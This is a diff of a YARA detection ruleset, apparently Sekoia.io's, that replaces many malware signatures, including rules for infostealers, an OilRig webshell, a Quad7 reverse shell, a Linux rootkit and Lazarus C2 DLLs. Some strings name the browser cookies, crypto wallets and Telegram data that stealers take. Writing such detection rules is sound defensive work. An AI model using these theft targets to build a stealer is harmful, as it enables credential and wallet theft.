 		score = 75
 		quality = 55
 		tags = "FILE"
@@ -236272,30 +237137,32 @@ rule SEKOIA_Infostealer_Win_Stealc : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$dec = { 55 8b ec 8b 4d ?? 83 ec 0c 56 57 e8 ?? ?? ?? ?? 6a 03 33 d2 8b f8 59 f7 f1 8b c7 85 d2 74 04 }
-		$str01 = "------" ascii
-		$str02 = "Network Info:" ascii
-		$str03 = "- IP: IP?" ascii
-		$str04 = "- Country: ISO?" ascii
-		$str05 = "- Display Resolution:" ascii
-		$str06 = "User Agents:" ascii
-		$str07 = "%s\\%s\\%s" ascii
+		$ = "<BODY ID=CV20_LoaderDlg BGCOLOR=LIGHTGREY style=\"font-family:MS Shell Dlg;font-size:8\">" ascii
+		$ = "<TABLE WIDTH=100% HEIGHT=100%>" ascii
+		$ = "<TR WIDTH=100% HEIGHT=45%>" ascii
+		$ = "<TD ALIGN=CENTER VALIGN=BOTTOM>" ascii
+		$ = "TODO: Place controls here." ascii
+		$ = "<TD ALIGN=RIGHT VALIGN=BOTTOM>" ascii
+		$ = "<BUTTON STYLE=\"WIDTH:100\" ID=\"ButtonHelp\">Help</BUTTON>&nbsp;&nbsp;<BUTTON STYLE=\"WIDTH:100\" ID=\"ButtonOK\">OK</BUTTON>&nbsp;<BUTTON STYLE=\"WIDTH:100\" ID=\"ButtonCancel\">Cancel</BUTTON>" ascii
+		$about_loader = /About V[0-9]+\.[0-9]+_Loader.../ wide
+		$path = "f:\\dd\\vctools\\vc7libs\\ship\\atlmfc\\include\\" wide
+		$regitry = "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $dec or 5 of ( $str* ) )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SEKOIA_Apt_Oilrig_Clipog_Strings : FILE
+rule SEKOIA_Apt_Oilrig_Webshell : FILE
 {
 	meta:
-		description = "Detects OilRig's Clipog stealer"
+		description = "Detects a webshell used by OilRig"
 		author = "Sekoia.io"
-		id = "0ac40fd9-f67d-41fa-a774-77a3a1b7cac3"
-		date = "2023-10-24"
+		id = "53955117-5176-4682-89ad-1503faba42aa"
+		date = "2024-10-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_oilrig_clipog_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "16f3fef59db9c58025a4a977de944b628e9dc850f87c1bb22e2f2f97601e5107"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_oilrig_webshell.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0e0879bafa1becf7e4aef008229a79ab8e0c50eda03232abd5cbb8fc59f482d3"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236303,109 +237170,76 @@ rule SEKOIA_Apt_Oilrig_Clipog_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[ClipBoard=" wide
-		$ = "[NUMPAD .]" wide
-		$ = "[SPACE]" wide
-		$ = "GetClipboardData"
+		$ = "string d = com;"
+		$ = "string p = fu;"
+		$ = "#@rt12!@$$$nnMF##"
+		$ = "messi(d)))"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 350KB and all of them
+		2 of them and filesize < 80KB
 }
-rule SEKOIA_Infostealer_Win_Banditstealer : FILE
+
+rule SEKOIA_Implant_Win_Apt29_2022_10
 {
 	meta:
-		description = "Finds BanditStealer samples based on specific strings"
+		description = "APT29 implants from October 2022"
 		author = "Sekoia.io"
-		id = "d1e45a5c-c06d-4161-8d30-fa94bcf0ea7a"
-		date = "2023-07-03"
+		id = "0f270e75-f687-4fdc-a980-fde81107a4d6"
+		date = "2023-02-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_banditstealer.yar#L1-L35"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "64d4860dd8a783be10541dd5c939dcd2a2b08309a7cd17b9dbbda1ba8b26485d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_win_apt29_2022_10.yar#L4-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b9300c2f06b54b16e1cab579d686d986caacf3b6eccec3a4e62d58e94b50bfb4"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
-
-	strings:
-		$spe01 = "Banditstealer" ascii
-		$spe02 = "BANDIT STEALER" ascii
-		$spe03 = "Location: Geolocation: " ascii
-		$spe04 = "awesomeProject2/core.GetWallets" ascii
-		$spe05 = "awesomeProject2/core.GetCreditCards" ascii
-		$spe06 = "awesomeProject2/core.GetCookies" ascii
-		$spe07 = "awesomeProject2/core.KillProcessByName" ascii
-		$spe08 = "main.sendZipToTelegram" ascii
-		$str01 = "json:\"city\"" ascii
-		$str02 = "UAC disabled" ascii
-		$str03 = "\\OpenVPN Connect\\profiles\\" ascii
-		$str04 = "\\Documents\\Monero\\wallets\\" ascii
-		$str05 = "cookies.sqlite" ascii
-		$str06 = "creditcard.txt" ascii
-		$str07 = "vmware.exe" ascii
-		$str08 = "aeachknmefphepccionboohckonoeemg" ascii
-		$str09 = "\\Documents\\NetSarang\\Xftp\\Sessions\\" ascii
-		$str10 = "\\WhatsApp\\Local Storage\\leveldb\\" ascii
-		$str11 = "Visited Time: %s" ascii
-		$str12 = "\\Google\\Chrome\\User Data\\Telegram Desktop\\tdata\\" ascii
+		hash1 = "1cffaf3be725d1514c87c328ca578d5df1a86ea3b488e9586f9db89d992da5c4"
+		hash2 = "381a3c6c7e119f58dfde6f03a9890353a20badfa1bfa7c38ede62c6b0692103c"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of ( $spe* ) and 6 of ( $str* )
+		pe.imphash( ) == "39b818e7bac0a276f509f8c47e467666" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "6621113d9f212c71b8dd3ce85c62b251" )
 }
-rule SEKOIA_Rootkit_Diamorphine_Strings : FILE
+rule SEKOIA_Loader_Win_Piccassoloader : CVE_2023_38831
 {
 	meta:
-		description = "Detects Diamorphine linux rootkit based on strings"
+		description = "Detect the variant of Picasso used by GhostWriter as CVE-2023-38831 exploitation payload"
 		author = "Sekoia.io"
-		id = "5a28be5c-9a57-4204-a7cc-42dfcaa2c2da"
-		date = "2024-10-21"
+		id = "91d9c2de-451e-467e-8f5c-38bbcce92b72"
+		date = "2023-09-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rootkit_diamorphine_strings.yar#L1-L31"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "622675e83bab630adc0f1c6c46c4d6d1"
-		hash = "013b23213975d2646e2435f058afcacf"
-		hash = "f068e83721f10ad74bb6f386a4375a91"
-		hash = "ba9d6a6bbde602fd414cea09fcbd1aa0"
-		hash = "fdd86788e295010c4e61bf6b589f340e"
-		hash = "0d396c1763503b35a7f601831bd684de"
-		hash = "66b8955188a3bda7ecdcd51cfd360313"
-		hash = "1e4fd8c6bf0e381ac395d9bff1f98a31"
-		hash = "ce08ce2b8bc1718052f5d0316e3e71b7"
-		hash = "94982037875d4fdb17681866afc12ade"
-		hash = "4fa2fe9ccde3e6bd4956e2b93ca5fcb6"
-		hash = "644c4ce0bbe4f1f1e3aae537a111d5b8"
-		hash = "fb7d594621fbb4f9bdb0eb74f6090ecd"
-		hash = "9faf1493164e734f533f0ecfb1737a98"
-		hash = "33d48b6c66715ab67a059ab940d759ff"
-		logic_hash = "70e2e9155181a717f1c2483a748d5991488f0ba7371a2b3c9cfada2ecc5812f9"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_piccassoloader.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "93e598f6c70dcb1ddf20ea926af72241e135bdf910f3721a7a0c3036f6a3d1b9"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 76
+		tags = "CVE-2023-38831"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "LKM rootkit" ascii fullword
-		$ = "m0nad"
+		$ = {2c 27 44 65 63 72 79 70 74 6f 72 27 2c 27 6e 6f 64 65 27 2c 27 55 73 65 72 2d}
+		$ = {5c 78 32 30 43 68 72 6f 6d 65 2f 31 30 27 2c 27 67 67 65 72 27 2c 27 73 65 64 43 69 70 68 65 72 27 2c 27 5f 61 70 70 65 6e 64 27 2c 27 5f 45 4e 43 5f 58 46 4f 52 4d 27 2c 27 57 53 63 72 69 70 74 2e 53 68 27}
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and all of them
+		1 of them
 }
-rule SEKOIA_Apt_Gamaredon_Stealer_Obfuscation_2 : FILE
+
+rule SEKOIA_Dotnet_Injector_New_Payload : FILE
 {
 	meta:
-		description = "Matches the Gamaredon Stealer obfuscation"
+		description = "New dotnet injector"
 		author = "Sekoia.io"
-		id = "fd278a90-537b-4c67-9421-01c9f2416b60"
-		date = "2022-02-04"
+		id = "b0a1d471-5381-4fa8-8563-7e72ecd15bed"
+		date = "2022-12-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_stealer_obfuscation_2.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6ffd8504ba8ca614d3941bd46b944d85e0ad4b9d8d2960d508f50550497d2852"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/dotnet_injector_new_payload.yar#L3-L30"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "8b5e2f6e7947471e10e0ec85eef1cebe1904c2e77b7cfe92e578ebe306041842"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236413,25 +237247,32 @@ rule SEKOIA_Apt_Gamaredon_Stealer_Obfuscation_2 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = { 3d 20 6e 65 77 20 73 74 72 69 6e 67 5b 5d 20 7b 20 [50-200] 20 7d 3b }
+		$f1 = "DownloadFile" ascii
+		$f2 = "StreamReader" ascii
+		$f3 = "ReadToEnd" ascii
+		$f4 = "Reverse" ascii
+		$f5 = "Load" ascii
+		$f6 = "StringToByteArray" ascii
+		$s1 = "Admin" wide
+		$s2 = "User" wide
+		$p1 = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" wide
+		$p2 = ".lnk" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 100MB and #s1 > 40
+		filesize < 300KB and all of ( $f* ) and all of ( $s* ) and all of ( $p* ) and dotnet.is_dotnet
 }
-rule SEKOIA_Unk_Quad7_Updtae_Reverse_Shell_Strings : FILE
+rule SEKOIA_Hacktool_Win_Powertool : FILE
 {
 	meta:
-		description = "Reverse shell used by Quad7 operators"
+		description = "Detect PowerTool based on strings"
 		author = "Sekoia.io"
-		id = "02d5394e-734c-4744-b293-1bf96bf1518c"
-		date = "2024-08-19"
+		id = "ab8355b8-322d-41a4-82f0-43896c96b9bc"
+		date = "2022-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/unk_quad7_updtae_reverse_shell_strings.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "40b5ac87ff87634c48fdd2cf64ccb66b"
-		hash = "4b8e97260d9ef6ca774675be682d9c8c"
-		logic_hash = "0e816716d4d7fd35617b1ac96ae99d68d5b96f64f8bef83d0f6aba2a3fbd9326"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_win_powertool.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "aeccba821e528ca03abc8b50362d450ba2c12ab443454faf5b2809aecd163648"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236439,57 +237280,57 @@ rule SEKOIA_Unk_Quad7_Updtae_Reverse_Shell_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "User-Agent: IOT"
-		$ = "/iot/post"
-		$ = "vender"
-		$ = "Response:  %s"
-		$ = "cmdNum"
-		$ = "UPDTAE"
-		$ = "cmdResult"
+		$str0 = "C:\\dev\\pt64_en\\Release\\PowerTool.pdb" ascii
+		$str1 = "Chage language nedd to restart PowerTool" ascii
+		$str2 = "(http://twitter.com/ithurricanept && https://www.linkedin.com/in/powertool)" wide
+		$str3 = "Infected=Before Fix, whether to back up the drive files will be fixed?" wide
+		$str4 = "Infected?-Are you sure to Fix the Infected Driver File?" wide
+		$str5 = "shellex\\ContextMenuHandlers\\PowerTool" wide
+		$str6 = "[PowerTool] name=%s, size=%d, %d" ascii
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 5MB and 4 of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule SEKOIA_Backdoor_Lin_Bifrost : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_12 : FILE
 {
 	meta:
-		description = "Detect the Bifrost backdor based on strings"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "9726b5f5-8cc3-4fad-950b-f20cac04d496"
-		date = "2024-03-05"
+		id = "b69186cf-9825-4d90-be20-7caa9e7de61f"
+		date = "2023-02-03"
 		modified = "2024-12-19"
-		reference = "https://unit42.paloaltonetworks.com/new-linux-variant-bifrost-malware/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_lin_bifrost.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a3fd671c02c29f67cf5b8d2d0e857336da72f989688f2db19cd028398080c5e2"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_sharpshooter_payload_12.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5c9692337c0dd533c7e49bd3850feedad93b256bc2fba45af6121f50ad83f4cc"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "8e85cb6f2215999dc6823ea3982ff4376c2cbea53286e95ed00250a4a2fe4729"
-		hash2 = "2aeb70f72e87a1957e3bc478e1982fe608429cad4580737abe58f6d78a626c05"
-		hash3 = "f2bef6bed27f4b527118dd62b4035003c14afaffa72729c8117f213623f644ec"
 
 	strings:
-		$ = "%c2%s%c3%u%c4%u-%.2u-%.2u %.2u:%.2u"
-		$ = "%c1%s%c3D%c4%u-%.2u-%.2u %.2u:%.2u"
+		$ = "ms.Write(ba, 0, (length / 4) * 3);"
+		$ = "var serialized_obj = "
+		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);"
+		$ = "var sc ="
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and all of them
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Loader_Win_Bumblebee : FILE
+rule SEKOIA_Tool_Advancedrun_Strings : FILE
 {
 	meta:
-		description = "Detect BUMBLEBEE based on specific strings"
+		description = "Detects AdvancedRun strings"
 		author = "Sekoia.io"
-		id = "ff36f512-c700-4f52-bc89-68ab9c69462c"
-		date = "2022-04-08"
+		id = "842a996e-0cf2-485f-9d3c-ccbd40c9ab6c"
+		date = "2024-09-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_win_bumblebee.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "97755e8d593acbc9acc8ce7f1a82a345fc7eea049addbb96577f6abc1b6d5fd6"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_advancedrun_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "a1d50ebe6124584f32de0625475cdb74"
+		logic_hash = "58e5e0c903057ff382a78a37ba289cbaa5949d99a4b5ff77a223e86aab591f5d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236497,51 +237338,60 @@ rule SEKOIA_Loader_Win_Bumblebee : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str0 = "Z:\\hooker2\\Common\\md5.cpp" wide
-		$str1 = "3C29FEA2-6FE8-4BF9-B98A-0E3442115F67" wide
-		$str2 = "bumblebee" ascii
+		$ = "nirsoft.net" wide
+		$ = "Another logged-in user" wide
+		$ = "Choose config file to save" wide
+		$ = "AdvancedRun" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint16be( 0 ) == 0x4d5a and all of them and filesize < 1MB
 }
-rule SEKOIA_Apt_Susp_Lazarus_Dangerous_Password : FILE
+rule SEKOIA_Apt_Queueseed : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects strings of Queueseed/Kapeka malware"
 		author = "Sekoia.io"
-		id = "726c8b92-7fbe-40f8-917a-cabd206028da"
-		date = "2023-09-12"
+		id = "35f7ffd5-4f6f-4b31-8d60-c713a15d14e8"
+		date = "2024-04-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_susp_lazarus_dangerous_password.yar#L1-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "2b159266bd6bba20ffaa627dac840840eaaad98e7962f48bbae428e687155b3d"
-		score = 65
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_queueseed.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "80d1135d63a351cabf45d2266c0ffc770e11669103107cd40caf00eb62c836ed"
+		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".jpeg" wide
-		$ = "mshta"
+		$ = {2D 00 6F 00 00 00}
+		$ = {2D 00 62 00 63 00 00 00}
+		$ = {20 00 00 00 00 00 00 00}
+		$ = {20 00 2D 00 77 00 00 00}
+		$ = {35 00 3A 00 20 00 00 00}
+		$ = {34 00 3A 00 20 00 00 00}
+		$ = {33 00 3A 00 20 00 00 00}
+		$ = {32 00 3A 00 20 00 00 00}
+		$ = {31 00 3A 00 20 00 00 00}
+		$ = {50 00 49 00 44 00 20 00 3A 00 20 00 00 00 00 00}
+		$ = "ExitCode : " wide
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and all of them and filesize < 5KB
+		uint16be( 0 ) == 0x4d5a and all of them and filesize < 200KB
 }
-
-rule SEKOIA_Apt_Spikedwine_Wineloader : FILE
+rule SEKOIA_Infostealer_Win_Agrat : FILE
 {
 	meta:
-		description = "Detects vineloader"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "7a599076-cd9d-42c4-a83a-9a991ede19fb"
-		date = "2024-02-29"
+		id = "472effe8-5044-4ca1-88e0-3e19d445b9d1"
+		date = "2022-06-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_spikedwine_wineloader.yar#L3-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c71d7ef8cb89d8fcd42e3178a729d912d5fe8e9eb396e46d7a0f5176a9398d75"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_agrat.yar#L1-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5b02880dbc75d9e4d95ec55c8e8630a47198ee4cc25e3ff79c93e9fe634fadca"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236549,28 +237399,35 @@ rule SEKOIA_Apt_Spikedwine_Wineloader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$c = { E8 ?? ?? ?? ?? 48 8D 0D
-        ?? ?? ?? ?? 48 8D 05 ??
-        ?? ?? ?? 48 89 05 ?? ??
-        ?? ?? 48 C7 05 ?? ?? ??
-        ?? ?? ?? 00 00 48 C7 05
-        ?? ?? ?? ?? ?? ?? 00 00 }
+		$str00 = "Vault.txt" wide
+		$str01 = "Credman.txt" wide
+		$str02 = "[Networks] {0}" wide
+		$str03 = "[Screenshot] {0}" wide
+		$str04 = "[Twitch] {0}" wide
+		$str05 = "Servers.txt" wide
+		$str06 = "[WindscribeVPN] {0}" wide
+		$str07 = "[{0}] Thread finished!" wide
+		$str08 = "[ERROR] Unable to enumerate vaults. Error (0x" wide
+		$str09 = "snowflake-ssh" wide
+		$str10 = "//setting[@name='Password']/value" wide
+		$str11 = "MakeScreenshot" ascii
+		$sys = "System.Collections.Generic.IEnumerator<Stealer." ascii
 
 	condition:
-		pe.is_dll( ) and filesize < 100KB and for any export in pe.export_details : ( $c in ( export.offset..export.offset + 100 ) )
+		uint16( 0 ) == 0x5A4D and all of them and #sys > 10
 }
-rule SEKOIA_Crypter_Win_Dotrunpex : FILE
+rule SEKOIA_Apt_Muddywater_Powgoop_Loader : FILE
 {
 	meta:
-		description = "Detect the dotRunpeX crypter based on strings"
+		description = "Detects the loader of PowGoop malware"
 		author = "Sekoia.io"
-		id = "6fb4ffe0-3a5c-432c-8ae2-404bb5960c30"
-		date = "2023-06-08"
+		id = "716b45e1-9f17-4546-a003-a7c78340d623"
+		date = "2022-01-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/crypter_win_dotrunpex.yar#L1-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8a2b9e19b49ba17f976241bec5323121ba13d2ce39fdcf2777fd97a230211e75"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_muddywater_powgoop_loader.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "70f20928d2bbe081f0595ecdbb6dbe58a2f0807032598d88d829513e6d75287f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -236578,54 +237435,59 @@ rule SEKOIA_Crypter_Win_Dotrunpex : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = {52 00 75 00 6e 00 70 00 65 00 58 00 2e 00 53 00 74 00 75 00 62 00 2e 00 46 00 72 00 61 00 6d 00 65 00 77 00 6f 00 72 00 6b 00 2e 00 65 00 78 00 65}
+		$s1 = "$d.Add($in[$i]);" ascii wide
+		$s2 = "[System.Text.Encoding]::UTF8.GetString($o);" ascii wide
+		$s3 = "$i+=(1+1)" ascii wide
+		$t = { 24 ?? 3d [1-15] 20 24 ?? 3b ?? ?? ?? 20 24 ?? 3b }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		filesize < 50KB and ( 3 of ( $s* ) or $t in ( filesize -50 .. filesize ) )
 }
-rule SEKOIA_Malware_Venom_Admin_Strings : FILE
+rule SEKOIA_Apt_Lazarus_Dll_C2_Comms : FILE
 {
 	meta:
-		description = "Detects Venom admin strings"
+		description = "Detects DLL communicating with the C2"
 		author = "Sekoia.io"
-		id = "4929340c-310b-4c59-a111-23409f973d22"
-		date = "2022-08-29"
+		id = "9b379aa8-77ce-4c76-ab13-05e35ebfbdfe"
+		date = "2023-04-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/malware_venom_admin_strings.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "205f16b07f58290b2898de7a7dd1e20f3d7651d738f0b15bf810f9be66eedf3d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_lazarus_dll_c2_comms.yar#L1-L33"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b5ba5ae25822cf54d530d1a18c8196194d44e4fd76be1a0bf98c193772286282"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "fe948451df90df80c8028b969bf89ecbf501401e7879805667c134080976ce2e"
+		hash2 = "bb1066c1ca53139dc5a2c1743339f4e6360d6fe4f2f3261d24fc28a12f3e2ab9"
+		hash3 = "dca33d6dacac0859ec2f3104485720fe2451e21eb06e676f4860ecc73a41e6f9"
+		hash4 = "69dd140f45c3fa3aaa64c69f860cd3c74379dec37c46319d7805a29b637d4dbf"
 
 	strings:
-		$ = "/admin/admin.go"
-		$ = "/cli/interactive.go"
-		$ = "/cli/cli.go"
-		$ = "/dispather/sender.go"
-		$ = "/dispather/proxy.go"
-		$ = "/dispather/handler.go"
-		$ = "/dispather/forward.go"
-		$ = "/utils/reuse_port.go"
+		$x1 = "vG2eZ1KOeGd2n5fr" ascii fullword
+		$s1 = "Windows %d(%d)-%s" ascii fullword
+		$s2 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36" wide fullword
+		$op1 = {B8 C8 00 00 00 83 FB 01 44 0F 47 E8 41 8B C5 48 8B B4 24 E0 18 00 00 4C 8B A4 24 E8 18 00 00 48 8B 8D A0 17 00 00 48 33 CC}
+		$op2 = {33 D2 46 8D 04 B5 00 00 00 00 66 0F 1F 44 00 00 49 63 C0 41 FF C0 8B 4C 84 70 31 4C 94 40 48 FF C2}
+		$op3 = {89 5C 24 50 0F 57 C0 C7 44 24 4C 04 00 00 00 C7 44 24 48 40 00 00 00 0F 11 44 24 60 0F 11 44 24 70 0F 11 45 80 0F 11 45 90}
 
 	condition:
-		filesize < 11MB and 6 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and ( filesize < 500KB and ( 1 of ( $x* ) or 2 of them ) or ( $x1 and 1 of ( $s* ) or 3 of them ) )
 }
-rule SEKOIA_Infostealer_Win_Ginzostealer_Str : FILE
+rule SEKOIA_Infostealer_Win_Vulturi : FILE
 {
 	meta:
-		description = "Finds samples of the Ginzo Stealer"
+		description = "Detect the Vulturi infostealer based on specific strings"
 		author = "Sekoia.io"
-		id = "ef87e94b-9c53-44b4-b8a1-87d371a6d2cb"
-		date = "2022-04-21"
+		id = "5369cbfb-ff94-4484-b5a4-894feeed97e1"
+		date = "2022-03-14"
 		modified = "2024-12-19"
